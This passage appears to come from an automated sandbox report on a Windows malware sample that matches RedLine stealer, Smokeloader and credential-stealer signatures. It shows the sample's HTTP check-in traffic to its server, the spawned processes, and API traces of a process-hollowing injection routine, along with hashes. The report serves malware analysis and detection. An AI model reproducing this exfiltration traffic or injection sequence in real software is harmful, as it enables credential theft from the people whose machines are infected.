2025-01-09 07:33:51 UTC	15331	OUT	Data Raw: 2d 2d 47 35 37 32 51 57 33 35 38 4e 34 55 57 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 35 42 33 31 37 36 44 44 45 30 45 44 37 42 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 47 35 37 32 51 57 33 35 38 4e 34 55 57 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 35 37 32 51 57 33 35 38 4e 34 55 57 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 47 35 37 32 51 57 33 35 38 4e Data Ascii: --G572QW358N4UW5IContent-Disposition: form-data; name="hwid"325B3176DDE0ED7BD0632DF0E28DC412--G572QW358N4UW5IContent-Disposition: form-data; name="pid"3--G572QW358N4UW5IContent-Disposition: form-data; name="lid"4h5VfH----G572QW358N
2025-01-09 07:33:51 UTC	5047	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2025-01-09 07:33:51 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:33:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=206rk1u9c4f2vds1tpqvet82bf; expires=Mon, 05 May 2025 01:20:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ns4aLDZh6wuv%2Bo6sRKqwWUGWlzMPW1QSDKIlwXnsa6gQ5ci1JLqX6WNjNjhLYawJ7ptc2bvEufq4rSnpPOA2W%2BWXyMg4nCIy1kxqQQOAem3NYIRNdo8DRnsfckW1Py5I7%2FF%2BJ0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bdd34e150f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1454&min_rtt=1449&rtt_var=555&sent=11&recv=25&lost=0&retrans=0&sent_bytes=3056&recv_bytes=21339&delivery_rate=2927807&cwnd=232&unsent_bytes=0&cid=677c506278e3cc47&ts=634&x=0"
2025-01-09 07:33:51 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-09 07:33:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:33:38
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\fuk7RfLrD3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\fuk7RfLrD3.exe"
Imagebase:	0x400000
File size:	504'320 bytes
MD5 hash:	E6F64122E4831F8A05FBEB8C1E4A731A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1382263686.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:33:40
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\fuk7RfLrD3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\fuk7RfLrD3.exe"
Imagebase:	0x400000
File size:	504'320 bytes
MD5 hash:	E6F64122E4831F8A05FBEB8C1E4A731A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:33:44
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\D1F3.tmp.exe"
Imagebase:	0x400000
File size:	341'504 bytes
MD5 hash:	D66791DB5C8D7BF392361E2343F7A5EA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1712229018.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:33:52
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7936 -s 1808
Imagebase:	0xc80000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	30.1%
Signature Coverage:	13.2%
Total number of Nodes:	136
Total number of Limit Nodes:	19

Executed Functions

Function 00670110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00670156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0067016C
CreateProcessA.KERNELBASE(?,00000000), ref: 00670255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00670270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00670283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0067029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 006702C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 006702E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00670304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0067032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00670399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 006703BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 006703E1
ResumeThread.KERNELBASE(00000000), ref: 006703ED
ExitProcess.KERNEL32(00000000), ref: 00670412

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 40a7425d85776904bf0911dc0f8d9147dec337e2562111a70365fe9835b72bb5
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 9BB1B674A00209EFDB44CF98C895F9EBBB5BF88314F248158E509AB395D771AE41CF94

Function 006F977E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006F97A6
Module32First.KERNEL32(00000000,00000224), ref: 006F97C6

Memory Dump Source

Source File: 00000000.00000002.1382263686.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f8000_fuk7RfLrD3.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 32f644605f7b9a35e3e5618b776c224d33010b31d6f50efc44cb3a97db20794c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: EBF062312107186BE7203FF5A88DBBA76E9AF49724F100529E742916C0DA70EC454A71

Function 0044DF40 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 261
timelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0044DFCC
SetLastError.KERNEL32(00000000), ref: 0044DFF2
GetDateFormatA.KERNELBASE(00000000,00000000,?,00000000,?,00000000), ref: 0044E01C
SetLastError.KERNEL32(00000000), ref: 0044E020
FoldStringA.KERNEL32(00000000,nexatukarayibibuwiyucazudiped,00000000,?,00000000), ref: 0044E05B
GetTimeFormatA.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 0044E08C
SetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0044E094
CancelWaitableTimer.KERNEL32(00000000), ref: 0044E09B
DeleteTimerQueue.KERNEL32(00000000), ref: 0044E0A2
_calloc.LIBCMT ref: 0044E0AA
_calloc.LIBCMT ref: 0044E0B1
_calloc.LIBCMT ref: 0044E0B8
_malloc.LIBCMT ref: 0044E0BE

Strings

nexatukarayibibuwiyucazudiped, xrefs: 0044E049
msimg32.dll, xrefs: 0044E1D1
F#, xrefs: 0044E226
'{@, xrefs: 0044DFB8

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _calloc$ErrorFormatLastTimer$BoostCancelDateDeleteFoldLibraryLoadPriorityProcessQueueStringTimeWaitable_malloc
String ID: '{@$msimg32.dll$nexatukarayibibuwiyucazudiped$F#
API String ID: 1705844635-485559073
Opcode ID: 374c04a50507b47b6835f1e9bbd111de7186fdc4e58875fdd59ff95be68f1765
Instruction ID: fd58d32f13defd777834848c9edc7932a13b0321ca177dec0daea04357841a3b
Opcode Fuzzy Hash: 374c04a50507b47b6835f1e9bbd111de7186fdc4e58875fdd59ff95be68f1765
Instruction Fuzzy Hash: 1591F7B5904300AFE310EF75DC8596B77ACFB88709F10493EF64696292DA78D844CB69

Function 00670420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00670533

Strings

saodkfnosa9uin, xrefs: 006704DA
0, xrefs: 00670492
d, xrefs: 00670584
mfoaskdfnoa, xrefs: 00670520, 00670523

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 48a2e9e13bc5c81ae3ab3b276dfa21265dd930e24121a5d2d64bb75bc2177d81
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: EE510970D08388DAFB11CBD8C949BDDBFB66F11708F244058D5486F286C3BA5659CBB6

Function 006705B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 006705EC

Strings

o, xrefs: 00670600
apfHQ, xrefs: 006705E2, 006705E5

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 5a1ad60316db7d3f267d2f609b2e2f9427e0117702c44c0c2b95cb20d2423d64
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 8E011E70C0424CEAEB10DB98C5583EEBFB5AF41308F148099C4096B342D7769B59CBA1

Function 0044DC40 Relevance: 4.6, APIs: 3, Instructions: 60
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(004BDCC0), ref: 0044DD1C
GetProcAddress.KERNEL32(00000000,00459238), ref: 0044DD59
VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0044DD79

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 64363d23dc77a8aec0e315ceb049e543d5880d189f3d745b471f29e1075873cc
Instruction ID: 49a2497d7dfb5466558318c4b477ad31bf2ad17c31a7d44a8104695f804bc58b
Opcode Fuzzy Hash: 64363d23dc77a8aec0e315ceb049e543d5880d189f3d745b471f29e1075873cc
Instruction Fuzzy Hash: 0531E114918380D7E305CB68FD447123F61AB65705F0455FCE1498B3B2E7FA8954D76E

Function 004036EC Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00403701

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: f239f6cf5a2dfa5bcba184ccec16e87f8f534ed04b827d818f1375800333c9a4
Instruction ID: 181bb39d6b5656e08b16c33b4b4b8576013ab21a2869d796d22793ab224d38d4
Opcode Fuzzy Hash: f239f6cf5a2dfa5bcba184ccec16e87f8f534ed04b827d818f1375800333c9a4
Instruction Fuzzy Hash: BCD05E72550384AEEB005FBA7C487623BDCD3C4796F108436F90CC71D1E974C980DA08

Function 006F943D Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006F948E

Memory Dump Source

Source File: 00000000.00000002.1382263686.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f8000_fuk7RfLrD3.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: b50bf1520d57de50ae22b239c34a0993737e3a195fd9e05ef395e433372bd1ec
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 91113C79A00208EFDB01DF98C985E98BBF5AF08351F058094FA489B362D371EA50DF90

Non-executed Functions

Function 00401000 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00401712
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401727
UnhandledExceptionFilter.KERNEL32(004541D0), ref: 00401732
GetCurrentProcess.KERNEL32(C0000409), ref: 0040174E
TerminateProcess.KERNEL32(00000000), ref: 00401755

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: b7602a3efd194b5748589b2d7eb37315925bfc2de9b38972d56bbaa2e8132157
Instruction ID: fe339ac6da377e611c93b0feb8c89945fd47e0f120f60e79f13586d8f1a2fad8
Opcode Fuzzy Hash: b7602a3efd194b5748589b2d7eb37315925bfc2de9b38972d56bbaa2e8132157
Instruction Fuzzy Hash: BB21BBB4911304DBD740EF65E949A553BE4FB4871AFA0403EE618A73A3EFB499808F4D

Function 0069F470 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
Instruction ID: 17bec288dcb6eb39f2ca768105eba2185596ce622bb500e225f65c6647b3f3fb
Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
Instruction Fuzzy Hash: EF021B71E002199FDF14CFA9D9806EEBBF6EF48314F25826AD919EB740D731AD418B80

Function 00404AB2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00004A70), ref: 00404AB7

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0fdb4b1d3ea58a66bb39cc344bbfc5c70be016acd4289aecbfd94dca460e1791
Instruction ID: 6186aeb3ec595a66f97efb60d4553a23aba2d6337a84de55bc06e3aaaaef82fb
Opcode Fuzzy Hash: 0fdb4b1d3ea58a66bb39cc344bbfc5c70be016acd4289aecbfd94dca460e1791
Instruction Fuzzy Hash: A89002A07E920086C61057F06C0990565A05AC8A177614471A346E90D5DB748040592D

Function 00697E14 Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
Instruction ID: 88f58707707d2281608da49f6600896d75be617b394e4175d0db662a273d0bdd
Opcode Fuzzy Hash: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
Instruction Fuzzy Hash: CED1A73210C1A34ECF2D4A39847007ABFE76A533A131D479EE4F6CBAC2ED25D955E660

Function 006A764F Relevance: .3, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 481fcb0e86618e44822d4df7e2a6b5adbf58f430410dbcd09fe0c1f1b3664a4f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: A7B14C352146098FD715DF28C88ABA57BA1FF46364F258698E899CF3A1C335ED82CF40

Function 006986F7 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 012cc86ba6f7a1933f87ee53a5d2c26226d507da0c2c45eef69feb1ba780dbab
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 0D9173722080A34EDF69467D853407EFFEA5E533A131A079ED4F2CBAC1EE24C555D620

Function 006989B2 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 6670b1f48a4056951e7d0ae43d3c87fdc240468acbc2615f3561e597a63ed24a
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 479162721090A34EDF69463D843407EFFE65A533A131E079ED4F2CBAC5EE24D965E620

Function 00698430 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: b9614be5fadc10b320af1f2a51da1249986a1c0aae4cec22d4f4e9c0208ae8d5
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: BC9183722080A34EDF69463A847447DFFEA5E537A131A079ED4F2CFAC1ED24C569D620

Function 0069DE7E Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: 94e0b48833b0787d43d1104cbc2fbfcba37c5cd9d036f7fcb7712b1775732fc2
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: BB614571200708A6DE38DA688997BFE639F9B51740F50093EE443DFFC1D6529D42C72A

Function 00698186 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 5cff10b6372ee5d53d29a22fdcd130c1b56e4c4f2513c558027845348d2a0a65
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: CE8185322080A30EDF6D467A843407EFFE65A537A131A079ED4F2CBAC5EE24C655D620

Function 00698EF0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: c0f6c736dab2b640565c7d95dd81bac0a68923d099e889466f456239e715a33c
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
